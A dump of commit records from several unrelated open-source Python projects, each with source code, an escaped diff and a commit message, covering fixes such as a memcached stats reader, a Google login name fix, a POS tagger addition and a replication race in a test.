what=["count(*)", "mean(vx)", "correlation(vx, vy)", "correlation(vx, vz)"],
visual=dict(row="what", column="subspace"),
title="Different statistics and plots", figsize=(14,12));
def test_slice(self):
with check_output("slice"):
self.dataset.plot("Lz", "E", z="FeH:-3,-1,10", show=True, visual=dict(row="z"), figsize=(12,8), f="log", wrap_columns=3);
def test_plot1d(self):
with check_output("plot1d"):
self.dataset.plot1d("Lz");
def test_healpix(self):
self.dataset.add_virtual_columns_cartesian_to_spherical()
self.dataset.add_column_healpix(longitude="l", latitude="b")
with check_output("plot_healpix"):
self.dataset.healpix_plot("healpix");
if __name__ == '__main__':
unittest.main()
|
Python
| 0.000001
|
@@ -1886,16 +1886,262 @@
e on%22)%0A%0A
+%09def test_single_nan(self):%0A%09%09with check_output(%22single_xy_no_nan%22):%0A%09%09%09self.dataset.plot(%22x%22, %22y%22, f=%22log%22)%0A%09%09cm = plt.cm.inferno%0A%09%09cm.set_bad(%22orange%22)%0A%09%09with check_output(%22single_xy_nan%22):%0A%09%09%09self.dataset.plot(%22x%22, %22y%22, f=%22log%22, colormap=cm)%0A%0A
%09def tes
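Decoded, the added test exercises bad-value (NaN) colors — a reconstruction of the escaped hunk above, not verbatim source:

    def test_single_nan(self):
        with check_output("single_xy_no_nan"):
            self.dataset.plot("x", "y", f="log")
        cm = plt.cm.inferno
        cm.set_bad("orange")  # color used for bad/NaN bins
        with check_output("single_xy_nan"):
            self.dataset.plot("x", "y", f="log", colormap=cm)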
|
3cefa75b8e9012d828453a764c0b169ab169fae6
|
fix google login names; associate with any user with same name
|
chip_friends/security.py
|
chip_friends/security.py
|
import random
import string
from flask import render_template
from flask_security import Security, PeeweeUserDatastore
from flask_social import Social
from flask_social.datastore import PeeweeConnectionDatastore
from flask_social.utils import get_connection_values_from_oauth_response
from flask_social.views import connect_handler, login_user, login_failed
from .app import app, db
from .models import Role, User, UserRoles, Connection
user_datastore = PeeweeUserDatastore(db, User, Role, UserRoles)
app.security = Security(app, user_datastore)
app.social = Social(app, PeeweeConnectionDatastore(db, Connection))
@login_failed.connect_via(app)
def on_login_failed(sender, provider, oauth_response):
connection_values = get_connection_values_from_oauth_response(
provider, oauth_response)
ds = app.security.datastore
password = ''.join(random.choice(string.ascii_letters) for _ in range(20))
user = ds.create_user(
email='', password=password, name=connection_values['full_name'])
ds.commit()
connection_values['user_id'] = user.id
connect_handler(connection_values, provider)
login_user(user)
db.commit()
return render_template('index.html')
|
Python
| 0
|
@@ -1,16 +1,56 @@
+from __future__ import unicode_literals%0A
import random%0Aim
@@ -848,35 +848,218 @@
-ds = app.security.datastore
+name = connection_values%5B'full_name'%5D%0A if isinstance(name, dict):%0A try:%0A name = '%7B%7D %7B%7D'.format(name%5B'givenName'%5D, name%5B'familyName'%5D)%0A except (ValueError, KeyError):%0A pass
%0A
@@ -1146,53 +1146,91 @@
user
- = ds.create_user(%0A
+, new = User.get_or_create(%0A name=name, defaults=%7B'
email
-=
+':
'',
+'
password
=pas
@@ -1229,17 +1229,19 @@
word
-=
+':
password
, na
@@ -1240,62 +1240,69 @@
word
-, name=connection_values%5B'full_name'%5D)%0A ds.commit()
+%7D)%0A # don't bother using the datastore, just use the model
%0A%0A
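Decoded, the fix normalizes Google's dict-shaped full_name and reuses any existing user with the same name — reconstructed from the escaped hunks above:

    name = connection_values['full_name']
    if isinstance(name, dict):
        try:
            name = '{} {}'.format(name['givenName'], name['familyName'])
        except (ValueError, KeyError):
            pass
    user, new = User.get_or_create(
        name=name, defaults={'email': '', 'password': password})
    # don't bother using the datastore, just use the model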
|
5836b48bbfa87ba706e6ddcb267dc375678695a8
|
use str
|
test/functional/feature_asset_burn.py
|
test/functional/feature_asset_burn.py
|
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
class AssetBurnTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 240
self.extra_args = [['-assetindex=1'],['-assetindex=1']]
def run_test(self):
self.nodes[0].generate(200)
self.sync_blocks()
self.basic_burn_syscoin()
self.basic_audittxroot1()
def basic_burn_syscoin(self):
self.basic_asset()
self.nodes[0].generate(1)
newaddress = self.nodes[0].getnewaddress()
self.nodes[0].assetsend(self.asset, newaddress, 0.5)
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 1)
# try to burn more than we own
        assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetallocationburn, self.asset, newaddress, 0.6, '0x931d387731bbbc988b312206c74f77d004d6b84b')
self.nodes[0].assetallocationburn(self.asset, newaddress, 0.5, '0x931d387731bbbc988b312206c74f77d004d6b84b')
self.nodes[0].generate(1)
out = self.nodes[0].listunspent(query_options={'assetGuid': self.asset})
assert_equal(len(out), 0)
def basic_asset(self):
self.asset = self.nodes[0].assetnew('1', 'TST', 'asset description', '0x9f90b5093f35aeac5fbaeb591f9c9de8e2844a46', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetBurnTest().main()
|
Python
| 0.000001
|
@@ -940,19 +940,21 @@
ddress,
+'
0.5
+'
)%0A
@@ -1267,11 +1267,13 @@
ss,
+'
0.6
+'
, '0
@@ -1383,19 +1383,21 @@
ddress,
+'
0.5
+'
, '0x931
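Decoded: the amounts are now passed as strings so the RPC layer receives exact decimal text rather than binary floats — the resulting calls, reconstructed from the hunks above:

    self.nodes[0].assetsend(self.asset, newaddress, '0.5')
    self.nodes[0].assetallocationburn(self.asset, newaddress, '0.6', '0x931d387731bbbc988b312206c74f77d004d6b84b')  # still over-burns
    self.nodes[0].assetallocationburn(self.asset, newaddress, '0.5', '0x931d387731bbbc988b312206c74f77d004d6b84b')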
|
9d2766a7b6aae9e3ad3c94925bdde100a70f6150
|
fix debug_view function
|
src/psd_tools/debug.py
|
src/psd_tools/debug.py
|
# -*- coding: utf-8 -*-
"""
Assorted debug utilities
"""
from __future__ import absolute_import
import sys
from collections import namedtuple
try:
from IPython.lib.pretty import pprint
_PRETTY_ENABLED = True
except ImportError:
from pprint import pprint
_PRETTY_ENABLED = False
def debug_view(fp, txt="", max_back=20):
"""
Print file contents around current position for file pointer ``fp``
"""
max_back = min(max_back, fp.tell())
fp.seek(-max_back, 1)
pre = fp.read(max_back)
post = fp.read(100)
fp.seek(-100, 1)
print(txt, repr(pre), "--->.<---", repr(post))
def pretty_namedtuple(typename, field_names, verbose=False):
"""
Return a namedtuple class that knows how to pretty-print itself
using IPython.lib.pretty library; if IPython is not installed
then this function is the same as collections.namedtuple
(with one exception: 'rename' argument is unsupported).
"""
cls = namedtuple(typename, field_names, verbose)
if _PRETTY_ENABLED:
PrettyMixin = _get_pretty_mixin(typename)
cls = type(str(typename), (PrettyMixin, cls), {})
# For pickling to work, the __module__ variable needs to be set to the frame
    # where the named tuple is created. Bypass this step in environments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython).
try:
cls.__module__ = sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
return cls
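# Illustrative usage (an editorial sketch based on the contract documented
# above; not part of the original module):
#
#   Point = pretty_namedtuple('Point', 'x y')
#   p = Point(1, 2)      # behaves exactly like collections.namedtuple
#   p.x + p.y            # -> 3
#   # With IPython installed, pretty-printing p renders one field per line.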
def _get_pretty_mixin(typename):
"""
Return a mixin class for multiline pretty-printing
of namedtuple objects.
"""
class _PrettyNamedtupleMixin(object):
def _repr_pretty_(self, p, cycle):
if cycle:
return "{typename}(...)".format(name=typename)
with p.group(1, '{name}('.format(name=typename), ')'):
p.breakable()
for idx, field in enumerate(self._fields):
if idx:
p.text(',')
p.breakable()
p.text('{field}='.format(field=field))
p.pretty(getattr(self, field))
return _PrettyNamedtupleMixin
|
Python
| 0.000021
|
@@ -88,16 +88,32 @@
e_import
+, print_function
%0Aimport
|
3baf96f6aaab793467b07aa664aa4bbd6ee7eaac
|
Update pos.py
|
cltk/tag/pos.py
|
cltk/tag/pos.py
|
"""Tag part of speech (POS) using CLTK taggers."""
import os
from nltk.tag import CRFTagger
from nltk.tokenize import wordpunct_tokenize
from cltk.utils.file_operations import open_pickle
__author__ = ['Kyle P. Johnson <kyle@kyle-p-johnson.com>']
__license__ = 'MIT License. See LICENSE.'
TAGGERS = {'greek':
{'unigram': 'unigram.pickle',
'bigram': 'bigram.pickle',
'trigram': 'trigram.pickle',
'ngram_123_backoff': '123grambackoff.pickle',
'tnt': 'tnt.pickle',
'crf': 'crf.pickle',
},
'latin':
{'unigram': 'unigram.pickle',
'bigram': 'bigram.pickle',
'trigram': 'trigram.pickle',
'ngram_123_backoff': '123grambackoff.pickle',
'tnt': 'tnt.pickle',
'crf': 'crf.pickle',
},
'old_norse':
{'tnt': 'tnt.pickle'
}
}
class POSTag:
"""Tag words' parts-of-speech."""
def __init__(self, language: str):
"""Setup variables."""
self.language = language
self.available_taggers = self._setup_language_variables(self.language)
def _setup_language_variables(self, lang: str): # pylint: disable=no-self-use
"""Check for language availability and presence of tagger files.
:param lang: The language argument given to the class.
:type lang: str
        :rtype: dict
"""
assert lang in TAGGERS.keys(), \
'POS tagger not available for {0} language.'.format(lang)
rel_path = os.path.join('~/cltk_data',
lang,
'model/' + lang + '_models_cltk/taggers/pos') # pylint: disable=C0301
path = os.path.expanduser(rel_path)
tagger_paths = {}
for tagger_key, tagger_val in TAGGERS[lang].items():
tagger_path = os.path.join(path, tagger_val)
assert os.path.isfile(tagger_path), \
'CLTK linguistics models not available for {0}.'.format(tagger_val)
tagger_paths[tagger_key] = tagger_path
return tagger_paths
def tag_unigram(self, untagged_string: str):
"""Tag POS with unigram tagger.
:type untagged_string: str
        :param untagged_string: An untagged, untokenized string of text.
        :rtype: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['unigram']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_bigram(self, untagged_string: str):
"""Tag POS with bigram tagger.
:type untagged_string: str
        :param untagged_string: An untagged, untokenized string of text.
        :rtype: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['bigram']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_trigram(self, untagged_string: str):
"""Tag POS with trigram tagger.
:type untagged_string: str
        :param untagged_string: An untagged, untokenized string of text.
        :rtype: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['trigram']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_ngram_123_backoff(self, untagged_string: str):
"""Tag POS with 1-, 2-, 3-gram tagger.
:type untagged_string: str
        :param untagged_string: An untagged, untokenized string of text.
        :rtype: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['ngram_123_backoff']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_tnt(self, untagged_string: str):
"""Tag POS with TnT tagger.
:type untagged_string: str
        :param untagged_string: An untagged, untokenized string of text.
        :rtype: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['tnt']
tagger = open_pickle(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
def tag_crf(self, untagged_string: str):
"""Tag POS with CRF tagger.
:type untagged_string: str
        :param untagged_string: An untagged, untokenized string of text.
        :rtype: str
"""
untagged_tokens = wordpunct_tokenize(untagged_string)
pickle_path = self.available_taggers['crf']
tagger = CRFTagger()
tagger.set_model_file(pickle_path)
tagged_text = tagger.tag(untagged_tokens)
return tagged_text
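# Illustrative usage (an editorial sketch; assumes the tagger models above
# are installed under ~/cltk_data, and the sample sentence is arbitrary):
#
#   tagger = POSTag('latin')
#   tagger.tag_unigram('Gallia est omnis divisa in partes tres')
#   # -> [('Gallia', <tag>), ('est', <tag>), ...]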
|
Python
| 0.000001
|
@@ -965,16 +965,124 @@
ickle'%0A
+ %7D,%0A 'middle_low_german':%0A %7B'ngram_12_backoff': 'backoff_tagger.pickle'%0A
@@ -4189,32 +4189,530 @@
urn tagged_text%0A
+ %0A def tag_ngram_12_backoff(self, untagged_string: str):%0A %22%22%22Tag POS with 1-, 2-gram tagger.%0A :type untagged_string: str%0A :param : An untagged, untokenized string of text.%0A :rtype tagged_text: str%0A %22%22%22%0A untagged_tokens = wordpunct_tokenize(untagged_string)%0A pickle_path = self.available_taggers%5B'ngram_12_backoff'%5D%0A tagger = open_pickle(pickle_path)%0A tagged_text = tagger.tag(untagged_tokens)%0A return tagged_text %0A
%0A def tag_tnt
|
2bc1cd6ab4be134758edcc8739b89ce4984131b4
|
Fix overly large try/except block.
|
zerver/management/commands/create_user.py
|
zerver/management/commands/create_user.py
|
import argparse
import logging
from typing import Any, Optional
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.core.management.base import CommandError
from django.db.utils import IntegrityError
from zerver.lib.actions import do_create_user
from zerver.lib.initial_password import initial_password
from zerver.lib.management import ZulipBaseCommand
class Command(ZulipBaseCommand):
help = """Create the specified user with a default initial password.
Sets tos_version=None, so that the user needs to do a ToS flow on login.
Omit both <email> and <full name> for interactive user creation.
"""
def add_arguments(self, parser: argparse.ArgumentParser) -> None:
self.add_create_user_args(parser)
self.add_realm_args(
parser, required=True, help="The name of the existing realm to which to add the user."
)
def handle(self, *args: Any, **options: Any) -> None:
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
if "email" not in options:
email = input("Email: ")
else:
email = options["email"]
try:
validators.validate_email(email)
except ValidationError:
raise CommandError("Invalid email address.")
if "full_name" not in options:
full_name = input("Full name: ")
else:
full_name = options["full_name"]
try:
if options["password_file"] is not None:
with open(options["password_file"]) as f:
pw: Optional[str] = f.read().strip()
elif options["password"] is not None:
logging.warning(
"Passing password on the command line is insecure; prefer --password-file."
)
pw = options["password"]
else:
# initial_password will return a random password that
# is a salted hash of the email address in a
# development environment, and None in a production
# environment.
user_initial_password = initial_password(email)
if user_initial_password is None:
logging.info("User will be created with a disabled password.")
else:
assert settings.DEVELOPMENT
logging.info(
"Password will be available via `./manage.py print_initial_password`."
)
pw = user_initial_password
do_create_user(
email,
pw,
realm,
full_name,
# Explicitly set tos_version=None. For servers that
# have configured Terms of Service, this means that
# users created via this mechanism will be prompted to
# accept the Terms of Service on first login.
tos_version=None,
acting_user=None,
)
except IntegrityError:
raise CommandError("User already exists.")
|
Python
| 0
|
@@ -1511,33 +1511,16 @@
name%22%5D%0A%0A
- try:%0A
@@ -1572,20 +1572,16 @@
-
-
with ope
@@ -1630,20 +1630,16 @@
-
pw: Opti
@@ -1667,20 +1667,16 @@
strip()%0A
-
@@ -1717,36 +1717,32 @@
ne:%0A
-
logging.warning(
@@ -1742,20 +1742,16 @@
arning(%0A
-
@@ -1842,34 +1842,26 @@
-
- )%0A
+)%0A
@@ -1889,38 +1889,30 @@
d%22%5D%0A
-
-
else:%0A
-
@@ -1961,28 +1961,24 @@
ssword that%0A
-
@@ -2034,20 +2034,16 @@
-
# develo
@@ -2098,20 +2098,16 @@
-
# enviro
@@ -2125,20 +2125,16 @@
-
-
user_ini
@@ -2185,20 +2185,16 @@
-
if user_
@@ -2227,36 +2227,32 @@
-
-
logging.info(%22Us
@@ -2306,38 +2306,30 @@
-
else:%0A
-
@@ -2368,36 +2368,32 @@
-
-
logging.info(%0A
@@ -2393,33 +2393,8 @@
nfo(
-%0A
%22Pas
@@ -2463,35 +2463,10 @@
d%60.%22
+)
%0A
- )%0A
@@ -2501,16 +2501,29 @@
ssword%0A%0A
+ try:%0A
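Decoded, the try block now starts after the password has been resolved, so it wraps only the user creation where IntegrityError can actually occur — reconstructed from the whitespace-heavy hunks above:

    pw = user_initial_password  # resolved outside any try block

    try:
        do_create_user(email, pw, realm, full_name, tos_version=None, acting_user=None)
    except IntegrityError:
        raise CommandError("User already exists.")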
|
45f3f41fa37192bdd246c390ed577056f5b844d2
|
add test for stitch_coordinates
|
test/test_experiment.py
|
test/test_experiment.py
|
import pytest
from py import path
@pytest.fixture
def experiment(tmpdir):
"'experiment--test' in tmpdir. Returns Experiment object."
from leicaexperiment import Experiment
e = path.local(__file__).dirpath().join('experiment--test')
e.copy(tmpdir.mkdir('experiment'))
return Experiment(tmpdir.join('experiment').strpath)
@pytest.fixture
def ometif16bit(tmpdir):
"16 bit ome.tif image in tmpdir. Returns py.path.local object of image."
image = path.local(__file__).dirpath().join('images', '16bit.ome.tif')
image.copy(tmpdir)
return tmpdir.join(image.basename)
def test_stitching(tmpdir, experiment):
"It should stitch images without error."
files = experiment.stitch(tmpdir.mkdir('stitched').strpath)
# returned files same as output
assert files == tmpdir.join('stitched').listdir(sort=True)
# both channels stitched
assert len(files) == 2
def test_looping(experiment):
"It should be able to loop through wells, fields and images."
for well in experiment.wells:
assert type(well) == str
for field in experiment.fields:
assert type(field) == str
for image in experiment.images:
assert type(image) == str
def test_compression(tmpdir, experiment):
"It should compress and decompress experiment without dataloss."
from leicaexperiment.experiment import decompress
from PIL import Image
import numpy as np
# compress
pngs = experiment.compress(folder=tmpdir.mkdir('pngs').strpath)
# reported output is actually written and the same amount
assert pngs == tmpdir.join('pngs').listdir('*.png', sort=True)
assert len(pngs) == len(experiment.images)
# keep data for decompress test
origs = []
orig_tags = []
# check that compression is lossless
for tif,png in zip(experiment.images, pngs):
img = Image.open(tif)
orig = np.array(img)
origs.append(orig)
orig_tags.append(img.tag.as_dict())
compressed = np.array(Image.open(png))
# is lossless?
assert np.all(orig == compressed)
new_tifs = decompress(pngs, folder=tmpdir.mkdir('new_tifs').strpath)
# reported output is actually written and the same amount as original
assert new_tifs == tmpdir.join('new_tifs').listdir(sort=True)
assert len(new_tifs) == len(experiment.images)
# orig and decompressed images have similar file size
for orig,new_tif in zip(experiment.images, new_tifs):
diff = abs(path.local(orig).size() - path.local(new_tif).size())
assert diff < 1024
omit_tags = [273, 278, 279]
# check that decompression is lossless
for tif,orig,orig_tag in zip(new_tifs, origs, orig_tags):
img = Image.open(tif)
decompressed = np.array(img)
# compress->decompress is lossless?
assert np.all(orig == decompressed)
# check if TIFF-tags are intact
tag = img.tag.as_dict()
for omit in omit_tags:
del tag[omit]
del orig_tag[omit]
assert tag == orig_tag
def test_stitch_png(tmpdir, experiment):
"It should stitch compressed images."
experiment.compress(delete_tif=True)
files = experiment.stitch(folder=tmpdir.mkdir('stitched').strpath)
# returned files same as output
assert files == tmpdir.join('stitched').listdir(sort=True)
# both channels stitched
assert len(files) == 2
def test_16bit(ometif16bit):
"It should compress and decompress 16 bit TIFF without dataloss."
from leicaexperiment.experiment import compress
from PIL import Image
import numpy as np
tif = ometif16bit.strpath
png = compress(tif)[0]
tif_data = np.array(Image.open(tif))
png_data = np.array(Image.open(png))
assert np.all(tif_data == png_data)
|
Python
| 0.000001
|
@@ -26,16 +26,65 @@
ort path
+%0Afrom leicaexperiment.experiment import attribute
%0A%0A@pytes
@@ -942,32 +942,231 @@
en(files) == 2%0A%0A
+ # stitch_coordinates%0A # images channel 0%0A imgs = %5Bi for i in experiment.images if attribute(i, 'c') == 0%5D%0A attrs = experiment.stitch_coordinates()%5B2%5D%0A assert len(attrs) == len(imgs)%0A%0A
%0Adef test_loopin
|
71ff3df25e91bbce77d68b154947e9d8f08b7d18
|
call socket.recv multiple times to get all stats
|
src/collectors/memcached/memcached.py
|
src/collectors/memcached/memcached.py
|
# coding=utf-8
"""
Collect memcached stats
#### Dependencies
* subprocess
#### Example Configuration
MemcachedCollector.conf
```
enabled = True
hosts = localhost:11211, app-1@localhost:11212, app-2@localhost:11213, etc
```
To use a Unix socket, set a host string like this:
```
hosts = /path/to/blah.sock, app-1@/path/to/bleh.sock,
```
"""
import diamond.collector
import socket
import re
class MemcachedCollector(diamond.collector.Collector):
GAUGES = [
'bytes',
'connection_structures',
'curr_connections',
'curr_items',
'threads',
'reserved_fds',
'limit_maxbytes',
'hash_power_level',
'hash_bytes',
'hash_is_expanding',
'uptime'
]
def get_default_config_help(self):
config_help = super(MemcachedCollector, self).get_default_config_help()
config_help.update({
'publish':
"Which rows of 'status' you would like to publish." +
" Telnet host port' and type stats and hit enter to see the" +
" list of possibilities. Leave unset to publish all.",
'hosts':
"List of hosts, and ports to collect. Set an alias by " +
" prefixing the host:port with alias@",
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(MemcachedCollector, self).get_default_config()
config.update({
'path': 'memcached',
# Which rows of 'status' you would like to publish.
# 'telnet host port' and type stats and hit enter to see the list of
# possibilities.
# Leave unset to publish all
# 'publish': ''
# Connection settings
'hosts': ['localhost:11211']
})
return config
def get_raw_stats(self, host, port):
data = ''
# connect
try:
if port is None:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(host)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, int(port)))
# request stats
sock.send('stats\n')
# something big enough to get whatever is sent back
data = sock.recv(4096)
except socket.error:
self.log.exception('Failed to get stats from %s:%s',
host, port)
return data
def get_stats(self, host, port):
        # keys that are always ignored; they aren't real stats
ignored = ('libevent', 'pointer_size', 'time', 'version',
'repcached_version', 'replication', 'accepting_conns',
'pid')
pid = None
stats = {}
data = self.get_raw_stats(host, port)
# parse stats
for line in data.splitlines():
pieces = line.split(' ')
if pieces[0] != 'STAT' or pieces[1] in ignored:
continue
elif pieces[1] == 'pid':
pid = pieces[2]
continue
if '.' in pieces[2]:
stats[pieces[1]] = float(pieces[2])
else:
stats[pieces[1]] = int(pieces[2])
# get max connection limit
self.log.debug('pid %s', pid)
try:
cmdline = "/proc/%s/cmdline" % pid
f = open(cmdline, 'r')
m = re.search("-c\x00(\d+)", f.readline())
if m is not None:
self.log.debug('limit connections %s', m.group(1))
stats['limit_maxconn'] = m.group(1)
f.close()
        except Exception:
self.log.debug("Cannot parse command line options for memcached")
return stats
def collect(self):
hosts = self.config.get('hosts')
# Convert a string config value to be an array
if isinstance(hosts, basestring):
hosts = [hosts]
for host in hosts:
matches = re.search('((.+)\@)?([^:]+)(:(\d+))?', host)
alias = matches.group(2)
hostname = matches.group(3)
port = matches.group(5)
if alias is None:
alias = hostname
stats = self.get_stats(hostname, port)
# figure out what we're configured to get, defaulting to everything
desired = self.config.get('publish', stats.keys())
# for everything we want
for stat in desired:
if stat in stats:
# we have it
if stat in self.GAUGES:
self.publish_gauge(alias + "." + stat, stats[stat])
else:
self.publish_counter(alias + "." + stat, stats[stat])
else:
                # we don't; it must be something configured in publish, so we
# should log an error about it
self.log.error("No such key '%s' available, issue 'stats' "
"for a full list", stat)
|
Python
| 0
|
@@ -2286,16 +2286,105 @@
port)))%0A
+%0A # give up after a reasonable amount of time%0A sock.settimeout(3)%0A%0A
@@ -2436,16 +2436,17 @@
ats%5Cn')%0A
+%0A
@@ -2456,91 +2456,341 @@
# s
-omething big enough to get whatever is sent back%0A data = sock.recv(4096)
+tats can be sent across multiple packets, so make sure we've%0A # read up until the END marker%0A while True:%0A received = sock.recv(4096)%0A if not received:%0A break%0A data += received%0A if data.endswith('END%5Cr%5Cn'):%0A break
%0A
@@ -2923,16 +2923,37 @@
, port)%0A
+ sock.close()%0A
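Decoded, the change sets a socket timeout and reads in a loop until memcached's END marker, since the stats response can span multiple TCP packets — reconstructed from the hunks above:

    sock.settimeout(3)  # give up after a reasonable amount of time
    sock.send('stats\n')
    while True:
        received = sock.recv(4096)
        if not received:
            break
        data += received
        if data.endswith('END\r\n'):
            break
    ...
    sock.close()  # added after the exception handler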
|
b2b19d5bd608db9286448000e1c998784139a614
|
update join
|
classmate_party/views.py
|
classmate_party/views.py
|
# -*- coding: utf-8 -*-
import os
import uuid
from PIL import Image
from django.shortcuts import render_to_response
from models import *
def index(request):
return render_to_response('index.html', locals())
def join(request):
msg = ''
category_choice = Person.CATEGORY_CHOICE
if request.method == 'POST':
        categories = request.POST.getlist('category')
name = request.POST.get('name')
phone_num = request.POST.get('phone_num')
pic = request.FILES.get('pic')
location1 = request.POST.get('location1', '')
location2 = request.POST.get('location2', '')
location = location1 + ' ' + location2
        if not categories:
msg = u'请勾选报名项目'
elif not name:
msg = u'请填写姓名'
elif not phone_num:
msg = u'请填写手机号'
else:
try:
im = Image.open(pic)
w, h = im.size
if h > 500:
r = h / 500.0
w = int(w / r)
h = int(h / r)
im = im.resize((w, h))
filename = "static/header/%s.png" % uuid.uuid4()
path = os.path.join(os.getcwd(), filename)
im.save(path)
pic_url = '/' + filename
                for category in categories:
person, created = Person.objects.get_or_create(category=category, name=name)
Person.objects.filter(name=name).update(
phone_num=phone_num,
pic_url=pic_url,
location=location
)
success = True
except:
msg = u'请上传一张您的近期照片'
return render_to_response('join.html', locals())
def list_persons(request):
rs = []
for category, category_display in Person.CATEGORY_CHOICE:
r = {}
r['category_display'] = category_display
r['persons'] = Person.objects.filter(category=category).order_by('update_time')
r['count'] = r['persons'].count
rs.append(r)
return render_to_response('list_persons.html', locals())
|
Python
| 0
|
@@ -1289,16 +1289,52 @@
lename%0A%0A
+ modify_persons = %5B%5D%0A
@@ -1464,16 +1464,66 @@
me=name)
+%0A modify_persons.append(person)
%0A%0A
@@ -1532,16 +1532,30 @@
+for person in
Person.o
@@ -1582,16 +1582,275 @@
ame)
-.update(
+:%0A update_fields = %5B'phone_num', 'pic_url', 'location'%5D%0A if person in modify_persons:%0A update_fields.append('update_time')%0A person.phone_num = ''%0A person.save()
%0A
@@ -1858,32 +1858,39 @@
+person.
phone_num=phone_
@@ -1882,17 +1882,19 @@
hone_num
-=
+ =
phone_nu
@@ -1894,17 +1894,16 @@
hone_num
-,
%0A
@@ -1919,24 +1919,32 @@
+person.
pic_url
-=
+ =
pic_url
-,
%0A
@@ -1960,24 +1960,31 @@
+person.
location
=locatio
@@ -1975,17 +1975,19 @@
location
-=
+ =
location
@@ -2003,16 +2003,59 @@
+ person.save(update_fields=update_fields
)%0A%0A
|
5e991fd00d980884f9210cfd5f25d5e7d91aabfc
|
Fix race condition in #144
|
test/replication/init_storage.test.py
|
test/replication/init_storage.test.py
|
import os
import glob
from lib.tarantool_server import TarantoolServer
# master server
master = server
master.admin('space = box.schema.create_space(\'test\', {id = 42})')
master.admin('space:create_index(\'primary\', \'hash\', {parts = { 0, \'num\' } })')
master.admin('for k = 1, 9 do space:insert(k, k*k) end')
for k in glob.glob(os.path.join(master.vardir, '*.xlog')):
os.unlink(k)
print '-------------------------------------------------------------'
print 'replica test 1 (must fail)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
for i in range(1, 10):
replica.admin('box.select(42, 0, %d)' % i)
replica.stop()
replica.cleanup(True)
master.admin('box.snapshot()')
master.restart()
master.admin('for k = 10, 19 do box.insert(42, k, k*k*k) end')
print '-------------------------------------------------------------'
print 'replica test 2 (must be ok)'
print '-------------------------------------------------------------'
replica = TarantoolServer()
replica.deploy("replication/cfg/replica.cfg",
replica.find_exe(self.args.builddir),
os.path.join(self.args.vardir, "replica"),
need_init=False)
replica.admin('space = box.space.test');
for i in range(1, 20):
replica.admin('space:select(0, %d)' % i)
replica.stop()
replica.cleanup(True)
server.stop()
server.deploy(self.suite_ini["config"])
|
Python
| 0
|
@@ -371,17 +371,20 @@
log')):%0A
-%09
+
os.unlin
@@ -807,25 +807,28 @@
nge(1, 10):%0A
-%09
+
replica.admi
@@ -1008,17 +1008,46 @@
) end')%0A
+lsn = master.get_param('lsn')
%0A
-
print '-
@@ -1474,17 +1474,38 @@
test');%0A
+replica.wait_lsn(lsn)
%0A
-
for i in
@@ -1523,9 +1523,12 @@
0):%0A
-%09
+
repl
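Decoded, the race fix captures the master's LSN after the inserts and has the replica wait for that LSN before selecting — reconstructed from the hunks above (the remaining hunks only replace tab indentation with spaces):

    master.admin('for k = 10, 19 do box.insert(42, k, k*k*k) end')
    lsn = master.get_param('lsn')
    ...
    replica.admin('space = box.space.test')
    replica.wait_lsn(lsn)  # ensure the rows are replicated before select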
|
69364c598f380a15cc5b03cb935bed0f2085bac1
|
fix a broken test
|
test/test_api/test_call_signatures.py
|
test/test_api/test_call_signatures.py
|
from textwrap import dedent
import inspect
from ..helpers import TestCase
from jedi import Script
from jedi._compatibility import is_py33
class TestCallSignatures(TestCase):
def _run(self, source, expected_name, expected_index=0, line=None, column=None):
signatures = Script(source, line, column).call_signatures()
assert len(signatures) <= 1
if not signatures:
assert expected_name is None
else:
assert signatures[0].name == expected_name
assert signatures[0].index == expected_index
def _run_simple(self, source, name, index=0, column=None, line=1):
self._run(source, name, index, line, column)
def test_simple(self):
run = self._run_simple
# simple
s1 = "abs(a, str("
run(s1, 'abs', 0, 4)
run(s1, 'abs', 1, 6)
run(s1, 'abs', 1, 7)
run(s1, 'abs', 1, 8)
run(s1, 'str', 0, 11)
s2 = "abs(), "
run(s2, 'abs', 0, 4)
run(s2, None, column=5)
run(s2, None)
s3 = "abs()."
run(s3, None, column=5)
run(s3, None)
# more complicated
s4 = 'abs(zip(), , set,'
run(s4, None, column=3)
run(s4, 'abs', 0, 4)
run(s4, 'zip', 0, 8)
run(s4, 'abs', 0, 9)
#run(s4, 'abs', 1, 10)
s5 = "abs(1,\nif 2:\n def a():"
run(s5, 'abs', 0, 4)
run(s5, 'abs', 1, 6)
s6 = "str().center("
run(s6, 'center', 0)
run(s6, 'str', 0, 4)
s7 = "str().upper().center("
